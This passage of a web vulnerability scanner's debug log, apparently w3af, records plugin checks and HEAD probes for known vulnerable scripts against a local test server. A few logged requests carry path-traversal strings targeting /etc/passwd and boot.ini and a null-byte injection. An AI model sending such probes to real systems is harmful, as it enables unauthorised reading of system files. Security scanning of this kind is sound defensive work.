10:04:33 2020 - debug] meta_generator.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] retirejs.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2325. [Wed Feb 12 10:04:33 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:33 2020 - debug] serialized_object.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] blank_body.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] credit_cards.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] websockets_links.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] csp.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] dom_xss.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] file_upload.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] keys.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] clamav.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2326. [Wed Feb 12 10:04:33 2020 - debug] vulners_db.grep(uri="http://localhost:9090/maps/") took 0.05s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2327. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4529. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/ashnews.php returned HTTP code "404" (id=24137,from_cache=0,grep=1,rtt=0.29,did=1qqFFsZe) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/cstat.pl returned HTTP code "404" (id=24138,from_cache=0,grep=1,rtt=0.04,did=L75gWKHN) [Wed Feb 12 10:04:33 2020 - debug] url_session.grep(uri="http://localhost:9090/maps/") took 0.02s to run [Wed Feb 12 10:04:33 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] objects.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_500.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_tags.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] password_profiling.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] click_jacking.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2328. [Wed Feb 12 10:04:33 2020 - debug] lang.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/maps/") took 0.02s to run [Wed Feb 12 10:04:33 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2329. [Wed Feb 12 10:04:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/maps/") took 0.02s to run [Wed Feb 12 10:04:33 2020 - debug] strange_reason.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cache_control.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_headers.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] ssn.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] oracle.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] feeds.grep(uri="http://localhost:9090/maps/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/wusage/ returned HTTP code "404" (id=24139,from_cache=0,grep=1,rtt=0.09,did=xSEFDGmi) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/WebShop/ returned HTTP code "404" (id=24140,from_cache=0,grep=1,rtt=0.10,did=Ln7sNZej) [Wed Feb 12 10:04:33 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/maps/") took 0.04s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2330. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2331. [Wed Feb 12 10:04:33 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] file_upload.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] expect_ct.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] svn_users.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] private_ip.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] motw.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_generator.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] retirejs.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:33 2020 - debug] serialized_object.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] blank_body.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] credit_cards.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] websockets_links.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] csp.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] dom_xss.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4528. [Wed Feb 12 10:04:33 2020 - debug] symfony.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] keys.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] vulners_db.grep(uri="http://localhost:9090/map/") took 0.04s to run [Wed Feb 12 10:04:33 2020 - debug] clamav.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2332. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2333. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/sh returned HTTP code "404" (id=24100,from_cache=0,grep=1,rtt=0.07,did=5GCOzWKn) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2334. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2335. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/pruebas/ returned HTTP code "404" (id=24141,from_cache=0,grep=1,rtt=0.15,did=x3uNHw8X) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/reviews/newpro.cgi returned HTTP code "404" (id=24142,from_cache=0,grep=1,rtt=0.06,did=ybO3iuOV) [Wed Feb 12 10:04:33 2020 - debug] url_session.grep(uri="http://localhost:9090/map/") took 0.02s to run [Wed Feb 12 10:04:33 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] objects.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_500.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_tags.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] password_profiling.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] click_jacking.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] lang.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/hitview.cgi returned HTTP code "404" (id=24143,from_cache=0,grep=1,rtt=0.08,did=xgTkycI9) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/dotproject/modules/files/index_table.php returned HTTP code "404" (id=24144,from_cache=0,grep=1,rtt=0.15,did=QLHZqqVT) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2336. [Wed Feb 12 10:04:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/map/") took 0.04s to run [Wed Feb 12 10:04:33 2020 - debug] strange_reason.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cache_control.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_headers.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] ssn.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] oracle.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] feeds.grep(uri="http://localhost:9090/map/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2337. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2338. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2339. [Wed Feb 12 10:04:33 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/map/") took 0.04s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/enter.cgi returned HTTP code "404" (id=24146,from_cache=0,grep=1,rtt=0.10,did=z234NJHV) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/nlog-smb.cgi returned HTTP code "404" (id=24145,from_cache=0,grep=1,rtt=0.21,did=dAzwCGSR) [Wed Feb 12 10:04:33 2020 - debug] symfony.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] expect_ct.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] svn_users.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] private_ip.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] motw.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_generator.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] retirejs.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:33 2020 - debug] serialized_object.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] blank_body.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] credit_cards.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] websockets_links.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] csp.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] dom_xss.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] file_upload.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] keys.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] vulners_db.grep(uri="http://localhost:9090/cs/") took 0.03s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/admin/script.php returned HTTP code "404" (id=24148,from_cache=0,grep=1,rtt=0.15,did=GrrIRsUG) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/emumail.cgi?type=.\x00 returned HTTP code "404" (id=24149,from_cache=0,grep=1,rtt=0.06,did=GPEIexTq) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/readme returned HTTP code "404" (id=24152,from_cache=0,grep=1,rtt=0.03,did=v2juRZue) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/logs/ returned HTTP code "404" (id=24153,from_cache=0,grep=1,rtt=0.01,did=rznvDT1a) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/servicios/ returned HTTP code "404" (id=24154,from_cache=0,grep=1,rtt=0.09,did=gfILPACk) [Wed Feb 12 10:04:33 2020 - debug] localhost:9090 connection pool stats (free:248 / in_use:0 / max:50 / total:248) [Wed Feb 12 10:04:33 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/logs/access_log returned HTTP code "404" (id=24155,from_cache=0,grep=1,rtt=0.04,did=Nv3f8EjO) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/passwords/ returned HTTP code "404" (id=24156,from_cache=0,grep=1,rtt=0.02,did=AOtBKP4u) [Wed Feb 12 10:04:33 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12548, 'reject-seen-url': 5812, 'reject-out-of-scope': 216, 'accept': 4949} [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/c_download.cgi returned HTTP code "404" (id=24159,from_cache=0,grep=1,rtt=0.07,did=3jHAzyyA) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/exchange/ returned HTTP code "404" (id=24157,from_cache=0,grep=1,rtt=0.09,did=BMnwZv2J) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/_mem_bin/ returned HTTP code "404" (id=24147,from_cache=0,grep=1,rtt=0.08,did=GOif7eCs) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/ultraboard.cgi returned HTTP code "404" (id=24150,from_cache=0,grep=1,rtt=0.04,did=Zgs1ePIT) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/search97.vts returned HTTP code "404" (id=24151,from_cache=0,grep=1,rtt=0.16,did=QnawBrFP) [Wed Feb 12 10:04:33 2020 - debug] clamav.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/adminwww.cgi returned HTTP code "404" (id=24158,from_cache=0,grep=1,rtt=0.05,did=WTpOHhig) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4527. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2340. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2341. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2342. [Wed Feb 12 10:04:33 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] objects.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_500.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_tags.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] password_profiling.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] click_jacking.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] lang.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] url_session.grep(uri="http://localhost:9090/cs/") took 0.02s to run [Wed Feb 12 10:04:33 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/tmp/ returned HTTP code "404" (id=24160,from_cache=0,grep=1,rtt=0.13,did=DKFkmwBe) [Wed Feb 12 10:04:33 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/cs/") took 0.05s to run [Wed Feb 12 10:04:33 2020 - debug] strange_reason.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cache_control.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_headers.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] ssn.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] oracle.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] feeds.grep(uri="http://localhost:9090/cs/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/WebShop/logs/cc.txt returned HTTP code "404" (id=24161,from_cache=0,grep=1,rtt=0.11,did=iwPhw2uJ) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/MSword/ returned HTTP code "404" (id=24163,from_cache=0,grep=1,rtt=0.06,did=FqSTgOLf) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/forum-ra_professionnel.asp?n=/.\\"./.\\"./.\\"./.\\"./.\\"./boot.ini returned HTTP code "404" (id=24165,from_cache=0,grep=1,rtt=0.03,did=Vkd0Ff5G) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24166,from_cache=0,grep=1,rtt=0.05,did=GQ0MMdOy) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2343. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/survey returned HTTP code "404" (id=24164,from_cache=0,grep=1,rtt=0.10,did=hcwNupjA) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/srchadm returned HTTP code "404" (id=24162,from_cache=0,grep=1,rtt=0.04,did=5fR0zpnX) [Wed Feb 12 10:04:33 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/cs/") took 0.08s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2344. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/data.sql returned HTTP code "404" (id=24167,from_cache=0,grep=1,rtt=0.10,did=DDaUyFnm) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/Data/settings.xml returned HTTP code "404" (id=24168,from_cache=0,grep=1,rtt=0.05,did=jjdpgUhS) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/users/scripts/submit.cgi returned HTTP code "404" (id=24170,from_cache=0,grep=1,rtt=0.09,did=YlFeu4N3) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/pu3.pl returned HTTP code "404" (id=24171,from_cache=0,grep=1,rtt=0.03,did=inJobxVY) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/pix/ returned HTTP code "404" (id=24172,from_cache=0,grep=1,rtt=0.08,did=aphxlhLO) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/compte.php returned HTTP code "404" (id=24173,from_cache=0,grep=1,rtt=0.05,did=wyOaov4l) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/webutils.pl returned HTTP code "404" (id=24174,from_cache=0,grep=1,rtt=0.12,did=vxB53F6y) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/environ.cgi returned HTTP code "404" (id=24175,from_cache=0,grep=1,rtt=0.09,did=TR4bxKRV) [Wed Feb 12 10:04:33 2020 - debug] symfony.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] file_upload.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/admin/cfg/configsite.inc.php returned HTTP code "404" (id=24176,from_cache=0,grep=1,rtt=0.06,did=0w8PIZFi) [Wed Feb 12 10:04:33 2020 - debug] localhost:9090 connection pool stats (free:247 / in_use:3 / max:50 / total:250) [Wed Feb 12 10:04:33 2020 - debug] Connections with more in use time: (80bea7272fdaf487, 0.03 sec) (9d93dcf445b288b8, 0.01 sec) (32935f7d2f0b2980, 0.00 sec) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/adsamples/config/site.csc returned HTTP code "404" (id=24169,from_cache=0,grep=1,rtt=0.06,did=px74qGeB) [Wed Feb 12 10:04:33 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:33 2020 - debug] expect_ct.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] svn_users.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] private_ip.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] motw.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_generator.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] retirejs.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2345. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/dasp/fm_shell.asp returned HTTP code "404" (id=24178,from_cache=0,grep=1,rtt=0.07,did=xzoXd1Ba) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/filemgmt/brokenfile.php returned HTTP code "404" (id=24177,from_cache=0,grep=1,rtt=0.11,did=mzwPN2I0) [Wed Feb 12 10:04:33 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 10:04:33 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: EPR069JK) [Wed Feb 12 10:04:33 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:33 2020 - debug] serialized_object.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] blank_body.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/29/") took 0.00s to run [Wed Feb 12 10:04:33 